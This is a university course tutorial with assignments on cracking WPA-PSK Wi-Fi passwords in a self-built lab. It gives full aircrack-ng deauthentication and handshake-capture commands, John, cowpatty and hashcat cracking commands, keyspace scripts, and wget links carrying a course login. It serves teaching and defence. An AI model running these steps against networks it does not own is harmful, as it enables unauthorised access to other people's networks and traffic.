WPA encryption cracking with dictionary attacks

Authors: Mikhail Zolotukhin and Timo Hämäläinen

1. Introduction

This tutorial explains how to crack wireless networks encrypted with WPA by using dictionary attacks. For this tutorial, you need two machines (virtual or physical) with wireless interfaces and a wireless access point, e.g. a WiFi router. One of the machines will be used as the client and the other as the attacker. In this tutorial, we assume that you install Kali Linux on the attacker machine. The WiFi router must support WPA encryption. To the best of our knowledge, VirtualBox cannot simulate wireless networking; for this reason, this tutorial should be done with real network devices. However, you can use the virtual machines you configured earlier, as described further in the tutorial.

Although the tutorial requires some physical devices, the assignments below can be completed without carrying out the attack described! You can just read through the tutorial and perhaps find and watch a video of this attack performed by someone else; there is no need to execute it yourself. Obviously, you will have less fun :)

The remainder of this tutorial is organized as follows. Preliminary questions are listed in Section 2. Configuration of the wireless router, the attacker and the client is presented in Section 3. The dictionary attack is demonstrated in Section 4. In Section 5, the dictionary attack is combined with brute forcing. Some simple assignments are listed in Section 6. Section 7 concludes the tutorial.

This tutorial (including assignments) takes on average 7.96 hours to complete.

2. Preliminary questions

  • What do the following abbreviations mean: AP, ESSID, BSSID?
  • What are WPA-PSK/WPA2-PSK, TKIP and AES?
  • What are the weakest features of the WPA-PSK?
  • What are simple measures that you can take to secure your WiFi?
  • What are brute force and dictionary attacks?
  • Why is the pure brute force technique not effective for WPA cracking?
  • What is a hybrid attack in this context?

3. Network configuration

As mentioned in the introduction, you need real wireless network devices to complete this tutorial.

3.1 Wireless access point

Below are the options for creating the access point:

Option 1:

You can use your home WiFi router:

Is there any other way to complete this task? I am doing this from my PC and don't have any laptop in use. I can not go to JYU campus, since I work at the same time. My PC does not have inner wi-fi so I use my USB Dongle the whole time. If I choose option 1 --> Insert your WiFi USB adapter into the host PC. We do assume here that this adapter is not primary interface of the host PC, i.e. there at least one more network interface on your host PC that is either physical or wireless. Using that dongle is my only option to get network. I do not have any other ways. What to do?

30 Sep 23 (edited 30 Sep 23)
  1. Open your router settings; the web page with the settings is usually at 192.168.1.1.
  1. Change the wireless network name (SSID) to "dd-wrt" (you can choose another name, but, in this tutorial, we assume it is named this way).

Just answer the questions in the assignments; most (all?) of the questions can be answered without carrying out the attack.

30 Sep 23 (edited 09 Oct 23)

I had a similar situation to the above mentioned one and used the method described in the answer to it: "Just answer the questions in the assignments, most (all?) of the questions can be answered without carrying out the attack", in both this assignment and the next one too (number 10), since it practically had the same difficulty.

17 Oct 23
  1. Disable SSID broadcast. This makes it harder for an attacker to find the wireless network name.
  1. Go to the wireless security settings, set the wireless security mode to WPA Personal (WPA PSK) and enter a password. For the sake of demonstration, we assume that the password is "labra123".
  1. Save and apply the new settings.

Option 2:

You can use your smartphone as the access point. How to configure the access point on a smartphone depends strongly on the smartphone's operating system and manufacturer, and it is beyond the scope of this tutorial. Your resulting smartphone-based access point should be configured as follows:

  • SSID: "dd-wrt"
  • SSID broadcast: disabled (disabling SSID broadcast is not mandatory)
  • Wireless security mode: WPA Personal (WPA-PSK)
  • WPA password: "labra123"

The last option:

We do encourage you to try one of the options described above. However, if you do not possess the devices required, you can come to our lab (Agora C331.1) and complete the tutorial here. We have everything: WiFi routers, WiFi dongles and laptops with Kali. Let us know in advance what day and time you would like to come.

3.2 Attacker

You are required to have a Kali machine that has a wireless interface. Below are the options for creating the attacker:

Option 1 (not recommended):

If you have a wireless USB adapter (WiFi dongle), you can use the virtual Kali attacker configured in previous tutorials of the course. The main advantage of this approach is that you do not have to install Kali on any machine, since you already have the virtual one. The drawback is that you do need a WiFi USB adapter. Even if you work on a laptop with a built-in WiFi module, you will need a WiFi dongle, since your virtual machine will see the laptop's WiFi module as a wired connection, but you need a wireless one. Second, since Kali is not designed for everyday use, it includes drivers only for devices from very common manufacturers; as a result, there is a chance that you will need to install specific drivers on your virtual Kali machine to make it work with the USB WiFi adapter.

However, the main reason why we do not recommend this option is that Kali WiFi applications, especially aircrack-ng, do not work well with virtual machines. In this particular tutorial, you most likely will not have any problems using a virtual attacker, but in the next one, you probably will.

If you pick this option, below are the steps for adding a wireless interface to your virtual Kali:

  1. Download VirtualBox extension pack from VirtualBox web site. Make sure that the extension pack version matches your VirtualBox version. Install it.

  2. In Windows everything should work out of the box. If your host PC runs Linux, you have to add your username to the vboxusers group:

    $ sudo usermod -aG vboxusers <your username>

    Substitute <your username> with your actual username. Log off and back in to finalize the change in permissions.

  1. Insert your WiFi USB adapter into the host PC. We assume here that this adapter is not the primary interface of the host PC, i.e. there is at least one more network interface on your host PC, either wired or wireless.
  1. Run your virtual gateway and Kali attacker.
  1. On Kali attacker, check the list of network interfaces:

    $ ip a

    There should be only one interface, eth0 (it may have a different name in your case; of course, we do not count "lo").

  1. Go to VirtualBox settings of Kali attacker, namely Devices -> USB. There should be the list of all USB devices connected to your host PC that may include keyboard, mouse, etc. Find your USB WiFi adapter and click on it.
  1. On the Kali VM, check the list of network interfaces again:

    $ ip a

    One more device should appear; in my case it was called wlan0, but the name can differ. Now you have two network interfaces on Kali, one of which is wireless. The configuration is complete.

One important point: when your wireless USB adapter is used by a virtual machine, your host PC cannot use it at the same time; that is why you need at least one more network interface on your host PC.

Option 2 (recommended):

If you do not have a WiFi USB adapter but do have a laptop with a built-in WiFi module, you can create and use a Kali live USB. The advantage of this approach is that you do not need a WiFi dongle, but you do need a USB stick of at least 8 GB, which will be formatted in the process. Once again, there is a risk that you will have to install specific drivers on the Kali machine to make it work with your laptop's WiFi module. Since you will use the wireless interface for the attack, you will need a wired network interface to connect to the Internet and download some files and packages. If your laptop does not have a wired interface, we recommend completing this and the next tutorial in the lab. Below are the steps for creating the attacker with a Kali live USB:

  1. Create a bootable Kali USB as described on the Kali web site.
  1. Boot the laptop from the USB stick. You can do it via the "Boot menu", which can be opened during the first few seconds after the laptop starts up.
  1. When you have booted into Kali, you can either install it on the laptop alongside your current operating system (only if you know how to do it) or just continue working in "live" mode. If you decide to actually install Kali but your laptop does not have a CD drive, you may run into the problem that the installation requires a CD-ROM. This is a well-known bug; you can search the Internet for a solution. In Linux, I managed to solve it by using "isohybrid" when creating the bootable USB. You can probably also get around it by simply choosing "Graphical Install" when you boot the Kali USB.
  1. When Kali has loaded, check the list of network interfaces:

    $ ip a

    There should be at least two devices (we do not count "lo", of course). In my case, these were eth0 and wlan0, but the names can differ in your case. Now you have two network interfaces on Kali, one of which is wireless. The configuration is complete.

The last option:

We do encourage you to try one of the options described above. However, if you do not possess the devices required, you can come to our lab (Agora C331.1) and complete the tutorial here. We have everything: WiFi routers, WiFi dongles and laptops with Kali. Let us know in advance what day and time you would like to come.

3.3 Client

Similar to the attacker, the client requires one wireless interface and can be configured using one of the options described in the previous subsection; however, the client needs only one network interface. For this purpose, you can simply use your smartphone (if it is not used as the access point in this tutorial) or a tablet, provided it has a WiFi module. If you want the client to be a virtual machine, you will need another WiFi dongle, because two VMs cannot use the same dongle at the same time.

  1. Create a wireless connection on the client. How to do this depends on the client's operating system.
  1. In this connection, enter the name of your wireless network ("dd-wrt"), set the security mode to WPA Personal and enter your password ("labra123"). Enable auto-reconnect for this network and disable it for any other networks.
  1. Connect to the hidden network dd-wrt and stay connected during the attack.

4. Dictionary Attack

  1. Open a terminal on the attacker machine with Kali Linux and type

    $ sudo airmon-ng

    It will show all wireless interfaces of your system, e.g. wlan0, wlan1, etc., and their statuses. Choose the interface that will be used for the attack. In this tutorial, the interface wlan0 is used.

  1. Type

    $ rfkill list

    and check that the wireless LAN is not blocked (in my case, it was hard-blocked by default). If it is, unblock it by typing:

    $ rfkill unblock wifi

    Otherwise, just skip this step.

  2. Type in the terminal

    $ sudo airmon-ng check kill

    to kill services that may interfere with airmon-ng.

  1. Disable the wlan0 interface:

    $ sudo ifconfig wlan0 down
  1. Spoof the MAC address of the selected wireless interface:

    $ sudo macchanger --mac 00:11:22:33:44:55 wlan0
  1. Restart the interface wlan0 with the new MAC:

    $ sudo airmon-ng start wlan0

    This puts your card into monitor mode. In monitor mode your card can listen to every packet in the air, whereas normally it only "hears" packets addressed to it. In addition, monitor mode allows you to inject packets. If successful, you should see that monitor mode is enabled on wlan0.

  1. Using the interface "wlan0" (the name may change in your case, e.g. it can become "wlan0mon"), start monitoring the available wireless networks by typing:

    $ sudo airodump-ng wlan0

    If you get the following error:

    Device or resource busy

    try killing NetworkManager by typing

    $ sudo kill <PID>

    where <PID> is the NetworkManager process ID.

  1. If successful, you will see the list of available wireless networks. If the list is empty (it happened to me once, but I could not reproduce this bug), simply try stopping the monitor interface and starting it again:

    $ sudo airmon-ng stop wlan0
    $ sudo airmon-ng start wlan0

    and then

    $ sudo airodump-ng wlan0

    If the list is still empty when you use a USB WiFi dongle, try unplugging it and plugging it in again.

  1. If successful, find the network corresponding to the WiFi router you have configured:
    • Its BSSID must equal the MAC address of the router
    • Its encryption mode is WPA
    • Its ESSID is hidden (in our case it may be shown as <length: 6>, because the wireless network name "dd-wrt" has 6 characters; sometimes it is shown as <length: 0>).
    Please make sure that you pick the network corresponding to your router, not the one belonging to your neighbour! :) Once you have found the target network, check which channel it uses. This information is needed for the next step. Hit CTRL+C to stop the running airodump.
  1. Configure airodump-ng to watch the target network, capture the authentication handshake against which password candidates can be checked, and write it to a file:

    $ sudo airodump-ng -c <channel> -w <filename> --bssid <BSSID> <interface>

    For example, in my case it looks as follows:

    $ sudo airodump-ng -c 6 -w wpacrack --bssid 58:6D:8F:6B:28:81 wlan0

    It will start monitoring the target network and write all captured data to the file "wpacrack-01.cap" in your current directory. The output has two parts. The first contains information about your wireless network: BSSID, data, channel, encryption, etc. The second contains information about the clients connected to this network. In particular, you can see the client MAC address in the STATION column, which is needed for the next step of the attack. If the client part is empty, try opening several web pages on the client machine connected to the target wireless network.

  1. To get the hidden ESSID we have to de-authenticate the client and read the ESSID when the client re-authenticates. For this purpose, open a second terminal on the attacker machine and type:

    $ sudo aireplay-ng -0 1 -a <access point's BSSID> -c <client's MAC> <interface>

    For example, in my case it looks as follows:

    $ sudo aireplay-ng -0 1 -a 58:6D:8F:6B:28:81 -c C4:17:FE:F8:BE:C7 wlan0
  1. Switch back to the first terminal window, which still has airodump-ng running. If successful, you will see the name of the target wireless network ("dd-wrt") in plain text. In addition, in the top right corner of the terminal you should see the following message:

    WPA handshake: (BSSID)

    where BSSID is the MAC address of your access point. This means that the authentication handshake has been captured. There should also be an EAPOL label in the Notes column. If the handshake message did not appear, run the command from step 11 one more time, generate some web traffic from the client, and run the command from step 11 again. If that does not help, repeat steps 8-12.

    Once the handshake is captured, hit CTRL+C to stop the running airodump.

    Airmon might break your network connections. If you cannot access the Internet after these steps, reboot Kali. If you use the live version, save your "wpacrack-01.cap" on an external drive or USB stick before rebooting.

  1. Download the password list:

    $ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/password.lst

    It is not compulsory to use this word list. There are plenty of word lists on the Internet and you are encouraged to use some of them.

  1. Install leafpad (what's wrong with gedit? no idea...):

    $ sudo apt install leafpad

    and open the file with the passwords:

    $ leafpad password.lst

    Search (Ctrl+F) for your password (labra123) in the list and, if it is not there, add it manually somewhere in the middle of the list for the sake of demonstration.

  1. Start a dictionary attack against a WPA key as follows:

    $ sudo aircrack-ng -e <ESSID> -w <dictionary_file> <capture_file.cap>

    which in our case looks similar to:

    $ sudo aircrack-ng -e dd-wrt -w password.lst wpacrack-01.cap

    Wait for a while and the password will be found.
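
The reason aircrack-ng is given the ESSID with -e, and the reason every guess is so expensive, is that WPA/WPA2-PSK derives the Pairwise Master Key from the passphrase with PBKDF2-HMAC-SHA1, using the SSID as the salt and 4096 iterations; each candidate from the word list has to be stretched the same way before it can be checked against the captured handshake. The Python script below is an added example, not part of the original tutorial or of the aircrack-ng project. It derives the PMK for the tutorial's constructed passphrase "labra123" and network "dd-wrt", checks the derivation against the public test vector from IEEE 802.11i (passphrase "password", SSID "IEEE"), and measures how many guesses per second one CPU core can stretch with Python's hashlib, which shows why a dictionary that contains the key is essential and why pure brute force over eight printable characters is out of reach.

```python
import hashlib
import time

# Parameters fixed by IEEE 802.11i for WPA/WPA2-Personal (PSK) networks.
PBKDF2_ITERATIONS = 4096
PMK_LENGTH = 32                      # bytes
MIN_PASSPHRASE, MAX_PASSPHRASE = 8, 63

# Public test vector from IEEE 802.11i (Annex H): passphrase "password", SSID "IEEE".
IEEE_TEST_VECTOR = (
    "password", "IEEE",
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
)


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key the way a WPA/WPA2-PSK station does.

    The SSID is the PBKDF2 salt: the same passphrase on a differently named
    network gives a different PMK, which is why aircrack-ng needs -e <ESSID>.
    """
    if not MIN_PASSPHRASE <= len(passphrase) <= MAX_PASSPHRASE:
        raise ValueError("a WPA passphrase must be 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("ascii"), PBKDF2_ITERATIONS, PMK_LENGTH)


def self_test() -> bool:
    """Check the derivation against the IEEE test vector."""
    passphrase, ssid, expected_hex = IEEE_TEST_VECTOR
    return wpa_pmk(passphrase, ssid).hex() == expected_hex


def pmk_rate(ssid: str, samples: int = 50) -> float:
    """Guesses per second one CPU core can stretch into PMKs with hashlib.

    The candidate strings are constructed here only to time the derivation.
    """
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"candidate{i:04d}", ssid)
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    assert self_test(), "PBKDF2 derivation does not match the IEEE test vector"
    ssid = "dd-wrt"                  # the tutorial's constructed lab network
    print("PMK for labra123 on dd-wrt:", wpa_pmk("labra123", ssid).hex())
    print("PMK for labra123 on home  :", wpa_pmk("labra123", "home").hex())
    rate = pmk_rate(ssid)
    print(f"single core, hashlib: {rate:,.0f} guesses/s")
    print(f"labra + three digits (1,000 guesses): {1000 / rate:.1f} s")
    print(f"eight printable characters (95**8 guesses): "
          f"{95 ** 8 / rate / 3600 / 24 / 365:,.0f} years")
```

The two PMKs printed for "labra123" differ only because the SSID differs, so a capture from one network cannot be cracked with a word list pre-computed for another name; this is also the point behind renaming a router away from its factory default, since precomputed tables exist for the most common SSIDs.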

5. Rule-based extension of the dictionary attack

The obvious limitation of the technique described in the previous section is that the key must be present in the dictionary file used for the attack. To extend the list of possible keys, we can use word list mangling rules to generate permutations and common password additions from a simple dictionary file.

5.1 John and Cowpatty

  1. Let us assume that our password "labra123" is not present in the word list, but the word "labra" is. Open the file "password.lst" with leafpad

    $ leafpad password.lst

    and substitute "labra123" with the simple "labra". Thus, the standard dictionary attack with the word list from "password.lst" would not succeed.

  1. To create rules for generating new words from the password list, John the Ripper can be used. John comes with a built-in set of rules that is fairly limited, but it uses a well-documented "regex-esque" syntax that allows you to define your own rules. Let us add a new rule that appends three digits to the end of each word in the password list.

    Install john:

    $ sudo apt install john

    Open the file "john.conf" in the directory "/etc/john" (the directory can differ between Kali versions):

    $ sudo leafpad /etc/john/john.conf

    You can also use nano instead of leafpad, but a graphical editor makes it faster to find the required section. Find the section [List.Rules:Wordlist]. It holds the rules that are applied to word lists. As you can see, it already contains several rules. Add the following line to the end of this section:

    $[0-9]$[0-9]$[0-9]

    It will append every combination of three digits to the end of each word in the word list.

    To speed up cracking, you can comment out all other lines in this section with the "#" symbol. Another way to accelerate the process is to remove one of the "$[0-9]" parts. In this case, you obviously also have to add "labra1" to the password list, otherwise the password will not be found. Save the changes.

  1. We could apply our mangling rule and find the password with the help of Aircrack. However, to demonstrate another Kali application, we use Cowpatty, which automates the dictionary attack against WPA-PSK. First, install it as follows:

    $ sudo apt install cowpatty

    The program is started from the command line, specifying a word list that contains the passphrase, a dump file that contains the WPA handshake, and the ESSID of the network. Run the following command in the terminal (note the space between "-" and "-r": "-f -" tells cowpatty to read the word list from standard input, i.e. from john):

    $ john --wordlist=<password_list> --rules --stdout | cowpatty -s <ESSID> -f - -r <capture_file-01.cap>

    which in our case looks as follows:

    $ john --wordlist=password.lst --rules --stdout | cowpatty -s dd-wrt -f - -r wpacrack-01.cap

    Wait a few minutes and the password "labra123" will be found.

5.2 Hashcat

Another tool for WPA password cracking is Hashcat. Like John, Hashcat comes with a set of rules that is fairly limited, but it uses a well-documented syntax that allows you to define your own rules.

  1. Install Hashcat on the attacker (if it is not installed) by typing:

    $ sudo apt update
    $ sudo apt install hashcat
  1. Next, install hcxtools, which are needed to convert the capture into Hashcat's format:

    $ sudo apt install hcxtools
  1. Convert the capture file to the hash format of Hashcat mode 22000:

    $ hcxpcapngtool -o hash.hc22000 wpacrack-01.cap
  1. Assuming we know that the password is 8 characters long, we can run hashcat against our capture file in pure brute-force mode as follows:

    $ hashcat -m 22000 hash.hc22000 -a 3 ?a?a?a?a?a?a?a?a -o cracked --potfile-disable

    where "-a 3" selects the brute-force (mask) attack mode, "?a" is the mask for one unknown character, "-o" is the output file for the password and "--potfile-disable" disables storing the cracked hashes in the potfile. This will take a long time, though.

    Since our password has three digits after "labra", we can accelerate the search considerably by running hashcat as follows:

    $ hashcat -m 22000 hash.hc22000 -a 3 labra?d?d?d -o cracked --potfile-disable

    where "?d" stands for an unknown digit. The password, if found, is stored in the file "cracked":

    $ cat cracked

    Below is the list of built-in charsets that can be used in hashcat masks (the "?s" set starts with a space and contains 33 characters):

    ?l = abcdefghijklmnopqrstuvwxyz
    ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
    ?d = 0123456789
    ?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
    ?a = ?l?u?d?s
    ?b = 0x00 - 0xff
  1. A dictionary attack (straight mode, the default) using Hashcat can be carried out as follows:

    $ hashcat -m 22000 hash.hc22000 password.lst -o cracked --potfile-disable
  1. Finally, a rule-based extension of the dictionary attack can be carried out as follows (one line):

    $ hashcat -m 22000 hash.hc22000 password.lst -r /usr/share/hashcat/rules/best64.rule -o cracked --potfile-disable

    where "-r /usr/share/hashcat/rules/best64.rule" points to the file with dictionary word manipulation rules.
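
A quick way to see why the mask labra?d?d?d finishes in seconds while ?a?a?a?a?a?a?a?a is hopeless, and what the John rule $[0-9]$[0-9]$[0-9] from Section 5.1 does to a word list, is to count the candidates each of them produces. The Python script below is an added example, not code from the tutorial, Hashcat or John the Ripper: mask_keyspace() computes the keyspace of a hashcat mask from the built-in charset sizes listed above, expand_append_rule() reproduces the candidates John's wordlist mode generates for a rule made of "$X" appends and "$[...]" classes (John's preprocessor expands each class into separate rules, but the resulting set of candidates is the same), and hours_to_exhaust() turns a candidate count into running time at an assumed guess rate. The rate used in the usage block, 100,000,000 guesses in 5 minutes, is an assumption taken from the "100kk words in 5 minutes" remark in the assignment discussion later on this page, not a measurement.

```python
import itertools
import re

# Sizes of hashcat's built-in charsets (?b is every byte value 0x00-0xff).
HASHCAT_CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "b": 256}


def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat mask (-a 3) expands to.

    "?x" is a charset placeholder, "??" a literal question mark and every
    other character a fixed literal (one choice).
    """
    total, i = 1, 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1
            continue
        if i + 1 == len(mask):
            raise ValueError("dangling '?' at the end of the mask")
        selector = mask[i + 1]
        if selector != "?":
            if selector not in HASHCAT_CHARSETS:
                raise ValueError(f"unknown charset ?{selector}")
            total *= HASHCAT_CHARSETS[selector]
        i += 2
    return total


# One "$X" (append X) or "$[...]" (append one character of the class) command.
_APPEND_CMD = re.compile(r"\$(\[([^\]]+)\]|.)")


def _class_chars(body: str) -> str:
    """Expand a John character class body such as '0-9' or 'a-c!' to its characters."""
    chars, i = [], 0
    while i < len(body):
        if i + 2 < len(body) and body[i + 1] == "-":
            chars.extend(chr(c) for c in range(ord(body[i]), ord(body[i + 2]) + 1))
            i += 3
        else:
            chars.append(body[i])
            i += 1
    return "".join(chars)


def expand_append_rule(word: str, rule: str):
    """Yield every candidate John's wordlist mode makes from `word` under a
    rule consisting only of append commands (the subset this tutorial uses)."""
    choices, pos = [], 0
    for m in _APPEND_CMD.finditer(rule):
        if m.start() != pos:
            raise ValueError(f"unsupported rule syntax near {rule[pos:]!r}")
        choices.append(_class_chars(m.group(2)) if m.group(2) else m.group(1))
        pos = m.end()
    if pos != len(rule):
        raise ValueError(f"unsupported rule syntax near {rule[pos:]!r}")
    for suffix in itertools.product(*choices):
        yield word + "".join(suffix)


def rule_keyspace(rule: str, wordlist_size: int) -> int:
    """Candidates produced when `rule` is applied to every word of a list."""
    per_word = sum(1 for _ in expand_append_rule("", rule))
    return per_word * wordlist_size


def hours_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Wall-clock hours to try every candidate at a constant guess rate."""
    return candidates / guesses_per_second / 3600


if __name__ == "__main__":
    rate = 100_000_000 / 300      # assumed rate: "100kk words in 5 minutes"
    for label, n in [
        ("labra?d?d?d", mask_keyspace("labra?d?d?d")),
        ("?a?a?a?a?a?a?a?a", mask_keyspace("?a?a?a?a?a?a?a?a")),
        ("1,000,000-word list + $[0-9]$[0-9]$[0-9]",
         rule_keyspace("$[0-9]$[0-9]$[0-9]", 1_000_000)),
    ]:
        print(f"{label:45} {n:>20,} candidates  {hours_to_exhaust(n, rate):>14,.2f} h")
    # A few of the candidates the rule yields for the tutorial's word "labra".
    print(list(expand_append_rule("labra", "$[0-9]$[0-9]$[0-9]"))[120:126])
</```

The same arithmetic is the defender's side of the story: a passphrase that is a dictionary word plus a short digit suffix sits inside a keyspace of a few million candidates even with rules applied, whereas 95**8 candidates at the assumed rate take on the order of hundreds of years, and WPA passphrases may be up to 63 characters long.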

6. Assignment (5p.)

6.1 Preliminary

Complete the test based on the preliminary questions (1 point).

# wpabrute_basic1

6.2 Basic

Read the advice below on how to choose a secure password for WiFi. Taking into account the information given in this tutorial, which pieces of advice do you think are good and which are not?

# wpabrute_basic2

In order to crack a WiFi network, an attacker can first try to collect some personal information about the victim and then use the pieces of information discovered to accelerate the password search.

Let's assume we know that:

  • Alice's WiFi network SSID is "dd-wrt"
  • The password for Alice's network starts with her name, with the case of some letters in the name toggled, e.g. "aLicE"
  • The name in the password is followed by Alice's year of birth

First, download the WPA handshake, captured in the same manner as demonstrated in the tutorial:

$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/wpa_alice.zip

Crack Alice's password using John the Ripper, Hashcat or any other password brute-force tool applied to the captured handshake file. If you choose John, here is a good guide with examples. Copy-paste the cracked password into the answer box below.

Alice's password (1 point):

# wpabrute_basic3

Read about the cracking tool called Reaver. Which vulnerability does this tool take advantage of? How can you protect yourself against Reaver attacks? Try to crack WPA/WPA2-PSK with this tool if your WiFi router supports WPS. Otherwise, you can just read any of the WPS attack tutorials that can be found on the Internet, e.g. here or there. Complete the test below based on the questions asked.

# wpabrute_basic4

Next, read the article "Using Multiscale Traffic Analysis to Detect WPS Attacks". What approach is used in the article to detect Reaver attacks? Complete the test below, devoted to the article's results.

# wpabrute_basic5_

6.3 Advanced

Download the WPA handshake captured in Bob's WiFi network "dd-wrt":

$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/wpa_bob.zip

This feels like a very time-consuming task if only some consonants and vowels are replaced, not all. Can you provide any tips for how to face the "some" aspect..? I have already tried both hashcat and john, but I can't progress. :/

13 Oct 23

To crack Bob's password, the attacker collects the following information about Bob, e.g. via social engineering:

  • He is from Tampere
  • He has a dog named Bear
  • His favorite team is Liverpool
  • He drives Porsche
  • He likes to spend holidays in Italy

Crack Bob's WiFi password if we know that:

  • The password is a combination of 2 or 3 of the keywords highlighted above
  • Some consonants in the password are in uppercase, and some are in lowercase
  • Some vowels can be munged as follows: "a" -> "@", "e" -> "3", "i" -> "1" or "!", and "o" -> "0"

Here are some clarifications. "A combination of 2 or 3 keywords" means 2 or 3 words without repetition, i.e. one word can be used only once in the password; e.g. "TampereTampere" and "BearBearBear" are not valid passwords. "Some consonants are in uppercase, and some are in lowercase" means that if there are, for example, two consonants of the same kind in the password, then one of them can be munged while the other is not, or both can be munged, or neither; e.g. "tamperebear", "tamperebeaR", "tampeRebear" and "tampeRebeaR" are all valid passwords. The same applies to the munging of vowels. Finally, the capital "I" in "Italy" can be munged the same way as a small "i", i.e. it can become "1" or "!" or remain "I".

As before, you can use John, Hashcat or any other password brute-force tool. Alternatively, you can generate a dictionary with a scripting language and then run it against the capture file. Copy-paste the cracked password into the answer box below.

Bob's password (2 points):

Generate the wordlist containing all possible passwords e.g. using python, test it with hashcat, easy!

13 Oct 23

Never tell me the odds? Good luck for anyone trying to guess this. I might be wrong but I estimated that there are about 2,8 billion possibilities for this one. Might take a while to run them all :D

14 Oct 23

Just to clarify: Is the capital "I" of Italy the only capital letter that can change? In other words, can the capitalized consonants of the other words also be lowercase? ofc they can

EDIT: Aren't there billions of combinations? At least my Kali can only process about a thousand in a few seconds; I don't think the intention is for my PC to run only this task for days. Is there a way to speed things up considerably, or are we misunderstanding something?

15 Oct 23 (edited 16 Oct 23)

Please do not waste time on writing comments here, you have billions of passwords to check :)

On a serious note: there should be far fewer possible combinations than 2.8 billion; not sure where this estimate comes from.

Hashcat can check 100kk words in 5 minutes on a more or less powerful pc.

16 Oct 23 (edited 16 Oct 23)
# wpabrute_advanced

6.4 General comments and feedback

Let us know how many hours in total you have spent on this assignment:

# wpabrute_time

On a scale from 1 to 10, estimate how interesting and how difficult the tutorial was:

# wpabrute_interest
# wpabrute_difficulty

You can also give us some general feedback:

# wpabrute_feedback

7. Conclusion

Although pure brute force is not effective against WPA encryption, attackers may still be able to crack it with the help of dictionary attacks. In this tutorial, this type of attack has been demonstrated. For this purpose, we have used various Kali applications such as Aircrack, Cowpatty, John the Ripper and Hashcat.

More information on the topic can be found at:

8. Comments
